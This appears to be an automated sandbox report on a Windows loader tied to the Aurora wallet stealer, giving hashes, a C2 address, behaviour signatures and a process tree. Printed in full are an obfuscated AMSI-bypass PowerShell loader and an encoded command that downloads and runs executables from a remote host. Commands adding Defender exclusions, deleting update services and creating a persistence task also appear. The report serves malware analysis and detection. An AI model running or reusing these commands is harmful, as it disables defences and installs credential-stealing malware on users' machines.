Analysis
-
max time kernel
59s -
max time network
92s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
11-03-2023 08:15
General
-
Target
C4Loader.exe
-
Size
1.1MB
-
MD5
39ce2b13bacdce1889b3ac7addcd471b
-
SHA1
5f75e695bbdca7994d62fe8aa4b3c5cd121bfc23
-
SHA256
104210a3f5ffe91ed31b25eaa45a7cad6aaaa01e54b4e24ae10d9c86d0c91a42
-
SHA512
26ca64c01b3847f744bca32c608d4a4f379f045f8e3db5becd0c35b80d34366e15aa9cb901c533b84a1910ca21f05c63655c0b955a810b1c34d8877284ddd889
-
SSDEEP
3072:ZwiwPz+huH7liXb6QF45A6Nmn0+Q/ycdIwYioOAg0FujDgtNs1bDew:CiEoX2Qm5A10+QacpDAOIs1bDew
Score
10/10
Malware Config
Extracted
Family
aurora
C2
107.182.129.73:8081
Signatures
-
Aurora
Aurora is a crypto wallet stealer written in Golang.
-
Modifies security service 2 TTPs 5 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Stops running service(s) 3 TTPs
-
Executes dropped EXE 4 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 1 IoCs
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 33 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{b185aaa6-40cf-4f18-8075-8336d01ed71a}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:yrlJdmjVooba{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kyUCBreoznPSCh,[Parameter(Position=1)][Type]$xvgasZlKaE)$ihiiNxzcOrC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'l'+[Char](101)+''+'c'+'t'+'e'+''+'d'+''+'D'+'el'+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+'e'+'m'+[Char](111)+''+[Char](114)+''+[Char](121)+'Mod'+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+[Char](121)+'p'+'e'+'',''+[Char](67)+''+'l'+''+'a'+''+'s'+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+'i'+'Cl'+'a'+'s'+'s'+''+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+'s'+'s',[MulticastDelegate]);$ihiiNxzcOrC.DefineConstructor(''+[Char](82)+'TS'+'p'+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+'e'+'B'+'y'+[Char](83)+''+[Char](105)+''+'g'+','+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$kyUCBreoznPSCh).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+','+'M'+'a'+'n'+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$ihiiNxzcOrC.DefineMethod('I'+'n'+'v'+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+','+[Char](72)+''+'i'+'deBy'+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$xvgasZlKaE,$kyUCBreoznPSCh).SetImplementationFlags('R'+[Char](117)+'n'+'t'+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+'g'+'e'+'d');Write-Output $ihiiNxzcOrC.CreateType();}$EyqGNboPemqvJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+'ic'+'r'+'os'+'o'+''+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'E'+[Char](121)+''+[Char](113)+''+[Char](71)+''+[Char](78)+''+[Char](98)+''+[Char](111)+'P'+[Char](101)+''+[Char](109)+'q'+[Char](118)+''+[Char](74)+'');$uGHYnmKyOsWxnS=$EyqGNboPemqvJ.GetMethod(''+[Char](117)+''+[Char](71)+''+[Char](72)+''+[Char](89)+''+[Char](110)+'m'+[Char](75)+''+[Char](121)+'O'+[Char](115)+''+[Char](87)+''+[Char](120)+''+[Char](110)+''+'S'+'',[Reflection.BindingFlags]''+'P'+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+'t'+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DyZkzUzwlYhhjoKfdqr=yrlJdmjVooba @([String])([IntPtr]);$aPYLgCHDWgXVUTIjJbENtA=yrlJdmjVooba @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$GlJqhqYmmwp=$EyqGNboPemqvJ.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'M'+'o'+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+'d'+[Char](108)+'l')));$mVSmRzmFxhIRrQ=$uGHYnmKyOsWxnS.Invoke($Null,@([Object]$GlJqhqYmmwp,[Object](''+[Char](76)+'o'+'a'+''+[Char](100)+''+[Char](76)+''+'i'+''+'b'+'r'+[Char](97)+''+'r'+'y'+[Char](65)+'')));$AiBpomfgeXqKmuSAu=$uGHYnmKyOsWxnS.Invoke($Null,@([Object]$GlJqhqYmmwp,[Object](''+[Char](86)+''+'i'+''+'r'+'t'+'u'+''+'a'+''+[Char](108)+''+'P'+''+[Char](114)+'o'+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$sNrvsZb=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mVSmRzmFxhIRrQ,$DyZkzUzwlYhhjoKfdqr).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+''+'.'+''+'d'+''+'l'+''+[Char](108)+'');$XPLrZmiYGOqIaNPXE=$uGHYnmKyOsWxnS.Invoke($Null,@([Object]$sNrvsZb,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+'ff'+[Char](101)+''+[Char](114)+'')));$ITzeJHUHYp=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AiBpomfgeXqKmuSAu,$aPYLgCHDWgXVUTIjJbENtA).Invoke($XPLrZmiYGOqIaNPXE,[uint32]8,4,[ref]$ITzeJHUHYp);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$XPLrZmiYGOqIaNPXE,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AiBpomfgeXqKmuSAu,$aPYLgCHDWgXVUTIjJbENtA).Invoke($XPLrZmiYGOqIaNPXE,[uint32]8,0x20,[ref]$ITzeJHUHYp);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+'i'+[Char](97)+''+[Char](108)+''+[Char](101)+'r'+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:LiHDIEgkRClB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ddTyMWMxxMoSGq,[Parameter(Position=1)][Type]$YZIqRpGdhu)$OOIXrjOCtEw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+'l'+''+[Char](101)+''+'c'+''+'t'+''+[Char](101)+'d'+'D'+''+[Char](101)+'le'+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+'M'+[Char](101)+''+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+[Char](101)+'leg'+'a'+''+'t'+''+'e'+'T'+'y'+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](65)+'uto'+'C'+'l'+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$OOIXrjOCtEw.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+'l'+''+'N'+'a'+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ddTyMWMxxMoSGq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+'i'+''+[Char](109)+''+'e'+''+','+'M'+[Char](97)+''+'n'+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$OOIXrjOCtEw.DefineMethod(''+[Char](73)+'n'+'v'+''+[Char](111)+''+[Char](107)+'e',''+'P'+''+'u'+'bli'+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+'y'+[Char](83)+'ig'+','+'Ne'+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+','+'V'+'i'+'r'+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$YZIqRpGdhu,$ddTyMWMxxMoSGq).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+'d'+'');Write-Output $OOIXrjOCtEw.CreateType();}$lQrsCGXNfqToa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+''+[Char](101)+'m'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+'i'+'cro'+[Char](115)+'o'+'f'+''+[Char](116)+'.'+[Char](87)+''+'i'+'n'+'3'+'2'+'.'+'U'+[Char](110)+''+'s'+'a'+'f'+'el'+[Char](81)+''+'r'+''+[Char](115)+''+[Char](67)+'G'+[Char](88)+''+[Char](78)+''+[Char](102)+'q'+[Char](84)+''+[Char](111)+''+'a'+'');$KmPZvkgmHqKPAc=$lQrsCGXNfqToa.GetMethod(''+[Char](75)+''+[Char](109)+''+[Char](80)+''+[Char](90)+''+[Char](118)+''+'k'+''+'g'+'mH'+[Char](113)+'K'+[Char](80)+''+[Char](65)+'c',[Reflection.BindingFlags]'P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hThWDYwraVrIkvrIgjr=LiHDIEgkRClB @([String])([IntPtr]);$cKKxeUbbRLxajtThWpBciP=LiHDIEgkRClB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aobqzsdqvOu=$lQrsCGXNfqToa.GetMethod('Ge'+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+'e'+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+'.d'+[Char](108)+''+[Char](108)+'')));$toHvChJAaVegcO=$KmPZvkgmHqKPAc.Invoke($Null,@([Object]$aobqzsdqvOu,[Object](''+'L'+''+[Char](111)+''+[Char](97)+'dL'+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+'r'+'y'+[Char](65)+'')));$XcSxdPhfDSXYGFwMe=$KmPZvkgmHqKPAc.Invoke($Null,@([Object]$aobqzsdqvOu,[Object]('V'+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+'r'+'o'+'t'+''+'e'+''+[Char](99)+''+[Char](116)+'')));$yPbiRoJ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($toHvChJAaVegcO,$hThWDYwraVrIkvrIgjr).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+'.'+[Char](100)+''+[Char](108)+'l');$MrbAEyrdQybkupIpG=$KmPZvkgmHqKPAc.Invoke($Null,@([Object]$yPbiRoJ,[Object]('A'+[Char](109)+''+[Char](115)+''+'i'+''+'S'+'ca'+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+''+'e'+'r')));$PEuXzNOdJP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XcSxdPhfDSXYGFwMe,$cKKxeUbbRLxajtThWpBciP).Invoke($MrbAEyrdQybkupIpG,[uint32]8,4,[ref]$PEuXzNOdJP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$MrbAEyrdQybkupIpG,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XcSxdPhfDSXYGFwMe,$cKKxeUbbRLxajtThWpBciP).Invoke($MrbAEyrdQybkupIpG,[uint32]8,0x20,[ref]$PEuXzNOdJP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'d'+'i'+'a'+''+[Char](108)+''+'e'+'rs'+[Char](116)+'age'+'r'+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\new2.exe"C:\Users\Admin\AppData\Local\Temp\new2.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\wmic.exewmic os get Caption6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C "wmic path win32_VideoController get name"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C "wmic cpu get name"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name7⤵
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 3003⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
